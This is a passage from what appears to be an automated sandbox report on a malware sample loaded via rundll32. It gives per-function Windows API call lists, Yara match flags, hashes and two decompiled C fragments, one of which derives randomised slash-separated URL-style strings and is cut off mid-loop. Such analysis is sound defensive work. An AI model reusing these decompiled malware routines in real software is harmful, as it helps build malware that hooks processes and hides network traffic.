                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 2b8f9099dac0d3b3bcace6bd4a5ae3caf0a384632d7c288081544b1ed575a0cb
                                • Instruction ID: bfc6a4a28ff5e18adb5be88c50f56bfde7569d97abe40b688450893fe408deea
                                • Opcode Fuzzy Hash: 2b8f9099dac0d3b3bcace6bd4a5ae3caf0a384632d7c288081544b1ed575a0cb
                                • Instruction Fuzzy Hash: 3E41C435A01219AFDF10EF69CC41BEE77B4EF4A310F00456AF819AF280DB70AE558B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,00000000,00000000,03473EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348C7D5
                                • GetLastError.KERNEL32(?,?,?,03473EC6,?,?), ref: 0348C7EE
                                • ResetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348C867
                                • GetLastError.KERNEL32(?,?,?,03473EC6,?,?), ref: 0348C882
                                  • Part of subcall function 0348EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                  • Part of subcall function 0348EC09: SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ErrorLastReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 1123145548-0
                                • Opcode ID: 1c08a62afb1cd8abe83f7f2f1f14057e7240b98906902e57281113fc0583a45e
                                • Instruction ID: 042f86e542a3699849a36bc7733868da0661a21acace60d9d810c54b5d32ccf2
                                • Opcode Fuzzy Hash: 1c08a62afb1cd8abe83f7f2f1f14057e7240b98906902e57281113fc0583a45e
                                • Instruction Fuzzy Hash: 7141D636A40204EFDB11FBA5CC84AAEB7B9AF84261F18096BE512EF650E730DD419764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 03489A93
                                • StrChrA.SHLWAPI(?,0000005C), ref: 03489ABA
                                • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 03489AE0
                                • lstrcpy.KERNEL32(?,?), ref: 03489B84
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrcpyn
                                • String ID:
                                • API String ID: 4154805583-0
                                • Opcode ID: 5c06b1bafe1d8f2f5db4478d89afa7004b3c0475ac984c558d4a8688efb48fb6
                                • Instruction ID: 687d55433ec6350b673438784f3246d83f3ba8417a216ea510b1fd1bc647db12
                                • Opcode Fuzzy Hash: 5c06b1bafe1d8f2f5db4478d89afa7004b3c0475ac984c558d4a8688efb48fb6
                                • Instruction Fuzzy Hash: 48411D76900259BFDB12EBA4CC84DEFBBFCEB09250F0445A7E905EB144D7349A44CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strupr
                                • String ID:
                                • API String ID: 3408778250-0
                                • Opcode ID: d5e84038293f09410b8daf70eedc4a64a955474ca5079e0389d0885f149c0558
                                • Instruction ID: 32140a7d459bda86baca730e51a49061057ec017848778601c07945d36e84fb5
                                • Opcode Fuzzy Hash: d5e84038293f09410b8daf70eedc4a64a955474ca5079e0389d0885f149c0558
                                • Instruction Fuzzy Hash: D74171368006099FEF61EFA9D888AFFB7E9EF44250F14491BE825DE224D734D454CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 03479D54
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034748C0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03474911
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 03474946
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 03474956
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                • String ID:
                                • API String ID: 4200334623-0
                                • Opcode ID: dec8bb34a7bf3f2ce458b851ce301b312b06cbda92f27222c78649323703914e
                                • Instruction ID: 82b1e2ce1548b24cda88fa329e82bfd287febb144f72469bf7b7c76894639fa1
                                • Opcode Fuzzy Hash: dec8bb34a7bf3f2ce458b851ce301b312b06cbda92f27222c78649323703914e
                                • Instruction Fuzzy Hash: 32313AB6500019BFDB00EFA5DC89CBFBBBDEF19250B110066F605EB214D771AE549BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                • SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                • GetLastError.KERNEL32 ref: 0348ECB9
                                  • Part of subcall function 0348F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,03492F4B,0000EA60,?,?,?,0348DD27,00000000,0000EA60,00000000), ref: 0348F1B2
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • GetLastError.KERNEL32(00000000), ref: 0348ECEE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 602384898-0
                                • Opcode ID: 1d1f3d7703b11d351e05070999e19fdfdbb8802b978706126447a921821bd3f8
                                • Instruction ID: 99a1e7a58c2206f01794213fb250e3aecb155d5112c355d648ef135d8fb303f0
                                • Opcode Fuzzy Hash: 1d1f3d7703b11d351e05070999e19fdfdbb8802b978706126447a921821bd3f8
                                • Instruction Fuzzy Hash: F5311EB5D00309FFDB21FFA5D88499FB7F8EF09204F14496BE502AA640D7319A898B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TlsGetValue.KERNEL32(?), ref: 03484BC8
                                • SetEvent.KERNEL32(?), ref: 03484C12
                                • TlsSetValue.KERNEL32(00000001), ref: 03484C4C
                                • TlsSetValue.KERNEL32(00000000), ref: 03484C68
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$Event
                                • String ID:
                                • API String ID: 3803239005-0
                                • Opcode ID: 6b04ed111192b2d2edae0aac3e3368abeef874746659528a334f823ce345eac0
                                • Instruction ID: 3fe517ed79807942d3dda95f5e551972a42ec6dd254901b617748a3b19119479
                                • Opcode Fuzzy Hash: 6b04ed111192b2d2edae0aac3e3368abeef874746659528a334f823ce345eac0
                                • Instruction Fuzzy Hash: EA21AD31100205AFCF21EF5ACC8A99EBBAAFB41710B19042BF412DE360C331DC51DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0348A8C1
                                • memcpy.NTDLL(00000018,?,?), ref: 0348A8EA
                                • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0348A929
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348A93C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                • String ID:
                                • API String ID: 2780211928-0
                                • Opcode ID: 51f97ade42381e00363bd3f5bbd0fda42c79d0ee9406cac69ff8494ae720bdc3
                                • Instruction ID: f3378a923ab4567885525c461e3a043e6538964bbbff97dcdf3a2a3f6ef9ec5d
                                • Opcode Fuzzy Hash: 51f97ade42381e00363bd3f5bbd0fda42c79d0ee9406cac69ff8494ae720bdc3
                                • Instruction Fuzzy Hash: 72318C70200209AFDB21EF29DC45E9B7BE8EF15320F11451BF919EA3A0D770D9558FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,03473EC6), ref: 03485540
                                  • Part of subcall function 0348550A: memset.NTDLL ref: 034855B6
                                  • Part of subcall function 0348550A: memset.NTDLL ref: 034855CA
                                • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0348F0F5
                                • lstrcmpi.KERNEL32(00000000,?), ref: 0348F11C
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0348F161
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0348F172
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                • String ID:
                                • API String ID: 1065503980-0
                                • Opcode ID: a8b4896b0ae2763a6c9a88946cf7399d2ab2a4d1aeca17bd7ccb0965899bdb92
                                • Instruction ID: 946fadafb832da5d17eb8096d9fd007f888694126ab14da823ae8df9a91d19a0
                                • Opcode Fuzzy Hash: a8b4896b0ae2763a6c9a88946cf7399d2ab2a4d1aeca17bd7ccb0965899bdb92
                                • Instruction Fuzzy Hash: 94216875A00209BFDF21FFA5EC84EAE7BB9EB15344F144067E904EE214D734AE489B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0348E0F3
                                • lstrlen.KERNEL32(00000000), ref: 0348E104
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • strcpy.NTDLL ref: 0348E11B
                                • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0348E125
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrlenmemsetstrcpy
                                • String ID:
                                • API String ID: 528014985-0
                                • Opcode ID: 217595572b4d4ceeb4615f1487ccd39067cdb50e6fc329f73fbd29ea19b8e07f
                                • Instruction ID: 32abef668f7906496856169d7d8adbefa4023e62d7f23947eb669bed5a2c044d
                                • Opcode Fuzzy Hash: 217595572b4d4ceeb4615f1487ccd39067cdb50e6fc329f73fbd29ea19b8e07f
                                • Instruction Fuzzy Hash: 1B219A76500301AFEB20BB24DC48B2FB7E8AF55712F04841EF8969E280EB75D485C62A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E0343264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E03436D63(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 5062df437ed22e91b0aca8e3a808cb2d47876a18abb60af5129fdcea3b29572a
                                • Instruction ID: ca66858c31d91194f2d7592c7f1bfe4b4cf3c4b9440f954cb0487ed3837f9ec0
                                • Opcode Fuzzy Hash: 5062df437ed22e91b0aca8e3a808cb2d47876a18abb60af5129fdcea3b29572a
                                • Instruction Fuzzy Hash: F2213079900209FFCB11DFA8C9849DEBBB8FF49215B14456AE905EB310EB70DA45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0349297E
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03492999
                                • GetLastError.KERNEL32 ref: 03492A07
                                • GetLastError.KERNEL32 ref: 03492A16
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalErrorLastSection$EnterLeave
                                • String ID:
                                • API String ID: 2124651672-0
                                • Opcode ID: 2cbe69f47707856052ab7b0b33b8a69bb26c9d7c97662c96aaf282e377ff122c
                                • Instruction ID: 4525b0420c5d3c7c24c39d98d0f39bfbe992d6366dd38ece115c96703596dae5
                                • Opcode Fuzzy Hash: 2cbe69f47707856052ab7b0b33b8a69bb26c9d7c97662c96aaf282e377ff122c
                                • Instruction Fuzzy Hash: A5214836900208EFDF22DF94D904A9EBBB8FF09720F15455BF816AA210C774EA119B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 03472FB3
                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 03472FF7
                                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0347303A
                                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0347305D
                                  • Part of subcall function 0348B9E9: GetTickCount.KERNEL32 ref: 0348B9F9
                                  • Part of subcall function 0348B9E9: CreateFileW.KERNEL32(03480971,80000000,00000003,0349A1E8,00000003,00000000,00000000,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA16
                                  • Part of subcall function 0348B9E9: GetFileSize.KERNEL32(03480971,00000000,?,00000001,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA49
                                  • Part of subcall function 0348B9E9: CreateFileMappingA.KERNEL32(03480971,0349A1E8,00000002,00000000,00000000,03480971), ref: 0348BA5D
                                  • Part of subcall function 0348B9E9: lstrlen.KERNEL32(03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA79
                                  • Part of subcall function 0348B9E9: lstrcpy.KERNEL32(?,03480971), ref: 0348BA89
                                  • Part of subcall function 0348B9E9: HeapFree.KERNEL32(00000000,03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BAA4
                                  • Part of subcall function 0348B9E9: CloseHandle.KERNEL32(03480971,?,00000001,?,03480971), ref: 0348BAB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                • String ID:
                                • API String ID: 3239194699-0
                                • Opcode ID: d98abf3b137b53a3381fbb12bf5c1043b265d7a0655161ccca499341bf62c8a9
                                • Instruction ID: 4d51432640863ea4ac924daa228272e4fb064c64ebc1da5131c7fd780c69b346
                                • Opcode Fuzzy Hash: d98abf3b137b53a3381fbb12bf5c1043b265d7a0655161ccca499341bf62c8a9
                                • Instruction Fuzzy Hash: E9217C35900248DFDF21EF66DC44EEEBBB8EF45350F28012AF925AA2A4D7318509DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03477D99
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0347C556,?), ref: 03477DAB
                                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0347C556,?), ref: 03477DC3
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,0347C556,?), ref: 03477DDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleModuleNamePointerRead
                                • String ID:
                                • API String ID: 1352878660-0
                                • Opcode ID: decd6f42da852db4b5df6e388a26ebc6809e78419b5f54e57d975fb1a5554084
                                • Instruction ID: 63adb03355e52fd1e306964eb8447eb93b1783b3326847594908f8c844ebe6a5
                                • Opcode Fuzzy Hash: decd6f42da852db4b5df6e388a26ebc6809e78419b5f54e57d975fb1a5554084
                                • Instruction Fuzzy Hash: 42115E71A01218BBDB22EB65CC88EFFBEACEF02654F144057F505E9154D3718A50CAA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,?), ref: 0347A28B
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347A2A2
                                • StrChrA.SHLWAPI(00000000,0000002E), ref: 0347A2AB
                                • GetModuleHandleA.KERNEL32(00000000), ref: 0347A2C9
                                  • Part of subcall function 03478C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 03478D0D
                                  • Part of subcall function 03478C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61), ref: 03478D28
                                  • Part of subcall function 03478C35: RtlEnterCriticalSection.NTDLL(0349A400), ref: 03478D4D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                • String ID:
                                • API String ID: 105881616-0
                                • Opcode ID: 0fd3533283d8e52960cded12fd39b7b2c0eb7326ca887642e67283cb3cf6d39e
                                • Instruction ID: 4fa3d01a00ed2fe66c811ae6dff95b6fa5621993760d8f6119366e39e0547dde
                                • Opcode Fuzzy Hash: 0fd3533283d8e52960cded12fd39b7b2c0eb7326ca887642e67283cb3cf6d39e
                                • Instruction Fuzzy Hash: E7213934A00209EFDB11DFA9C948AAEBBF9EF45300F14855AE806AF350DB70D981CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,034766C0,?,00000000,?), ref: 03491CAB
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,034766C0,?,00000000,?), ref: 03491CCD
                                • lstrcpyW.KERNEL32(00000000,?), ref: 03491CF9
                                • lstrcatW.KERNEL32(00000000,?), ref: 03491D0C
                                  • Part of subcall function 0347B83F: strstr.NTDLL ref: 0347B917
                                  • Part of subcall function 0347B83F: strstr.NTDLL ref: 0347B96A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 3712611166-0
                                • Opcode ID: 73fce084c9722be2cce2dffe23371e58d30515ee3eaf3d8171649882f568d77d
                                • Instruction ID: b5f2d21a1c768374468a03a0433119861466863013c78dbf50047bc77448fbbb
                                • Opcode Fuzzy Hash: 73fce084c9722be2cce2dffe23371e58d30515ee3eaf3d8171649882f568d77d
                                • Instruction Fuzzy Hash: 1811567650011ABFEF11AFA2CC88CDF7FACEF09264B10456AF904AE110D734EA418BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03491D62
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03491D86
                                • RegCloseKey.ADVAPI32(?), ref: 03491DDE
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 03491DAF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: QueryValue$AllocateCloseHeapOpen
                                • String ID:
                                • API String ID: 453107315-0
                                • Opcode ID: aa289295fcbe106e4476ff0cf1198dc8ebeadfcbeb1e374ab1a5dad28822ad75
                                • Instruction ID: 56340dfd16042465d78e2f92fe37234b313a397cfc73162322477a8058af987b
                                • Opcode Fuzzy Hash: aa289295fcbe106e4476ff0cf1198dc8ebeadfcbeb1e374ab1a5dad28822ad75
                                • Instruction Fuzzy Hash: E621EAB990010DFFEF11EF95C8848EEBFBDEB48250F24855BE801AB214E771AA51DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0348EAA8,00000000,?,00000000,0347E842,00000000,0616C310), ref: 03472646
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347265E
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0348EAA8,00000000,?,00000000,0347E842,00000000,0616C310), ref: 034726A2
                                • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 034726C3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: e2329b2c990f1224a61199d0e835e83c40a7463db8d25ac51fdc01cdd5aefe6f
                                • Instruction ID: c232d5c76acc950b4c0a95a1949630678d7de217f072544cf897b6453c834a27
                                • Opcode Fuzzy Hash: e2329b2c990f1224a61199d0e835e83c40a7463db8d25ac51fdc01cdd5aefe6f
                                • Instruction Fuzzy Hash: 82110672A00214AFC710DF6ADC84E9FBBEEDB92250B190177E404EF251E6709E0487A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E03434162(unsigned int __eax, void* __ecx) {
                                				// Copies the string in EAX into a new heap buffer, splitting it into chunks of
                                				// 8 to 24 bytes separated by '/'. Chunk lengths come from a 32-bit LCG
                                				// (multiplier 0x19660d, increment 0x3c6ef35f) kept at 0x343a2f0.
                                				// Returns the new buffer, or NULL if the allocation fails.
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // unresolved import: lstrlen (see APIs, ref 0343416D)
                                				_t38 = __eax; // remaining input length
                                				_t30 = RtlAllocateHeap( *0x343a2d8, 0, (__eax >> 3) + __eax + 1); // room for one '/' per 8 bytes plus the NUL
                                				_v12 = _t30; // start of the output buffer
                                				if(_t30 != 0) {
                                					_v8 = _t42; // read cursor into the input
                                					do {
                                						_t33 = 0x18; // upper bound for a chunk: 24 bytes
                                						if(_t38 <= _t33) {
                                							_t33 = _t38; // or the remaining length, if shorter
                                						}
                                						_t21 =  *0x343a2f0; // 0xd600d5cd, current LCG state
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d; // LCG step
                                						 *0x343a2f0 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8; // chunk length in [8, _t33); modulus is zero if the input is 8 bytes or shorter
                                						memcpy(_t30, _v8, _t45); // copy the chunk
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc; // decompiler residue: stack clean-up of memcpy's three arguments
                                						 *_t27 = 0x2f; // append the '/' separator
